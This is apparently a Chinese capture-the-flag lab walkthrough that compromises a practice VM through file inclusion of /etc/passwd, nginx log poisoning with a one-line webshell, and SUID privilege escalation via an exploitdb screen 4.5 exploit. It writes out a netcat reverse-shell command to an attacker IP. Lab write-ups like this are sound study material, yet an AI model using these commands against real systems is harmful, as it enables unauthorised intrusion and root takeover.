目录
一、存活主机扫描
使用arp-scan -l扫描靶机IP
二、端口探测
使用nmap -A -sS 192.168.3.130探测端口,开放了80端口和111端口。
三、爆破目录
爆破出的是网站首页的文件,发现footer.php刷新后时间会变化。
以及首页留言提交后的时间也会变化
四、文件包含
那么thankyou.php应该是包含了footer.php。尝试使用文件包含,可以包含/etc/passwd,存在文件包含
这里尝试使用input伪协议未成功。查看插件发现是nginx中间件,可以利用包含日志,验证后发现可包含。Nginx日志位置为:/var/log/nginx/access.log
随意访问不存在的url:xxx/12345678,再次包含日志发现成功显示错误的url
把一句话写进url里,这样包含日志即可getshell
五、反弹shell
使用nc反弹shell:nc 192.168.3.128 5555 -e /bin/sh
再使用python获得交互式shell:python -c 'import pty; pty.spawn("/bin/bash")'
六、screen提权
使用sudo -l查看能执行的命令,发现没有sudo命令
使用命令find / -perm -u=s -type f 2>/dev/null进行suid提权,发现screen 4.5版本。
Screen是一个全屏窗口管理器,它在多个进程(通常是交互式shell)之间多路传输物理终端。
在Kali自带的exploit中查找对应的exp,自带的exp所在位置为:/usr/share/exploitdb/exploits/,把exp上传至靶机中添加权限执行后运行,提权为root用户。
获得flag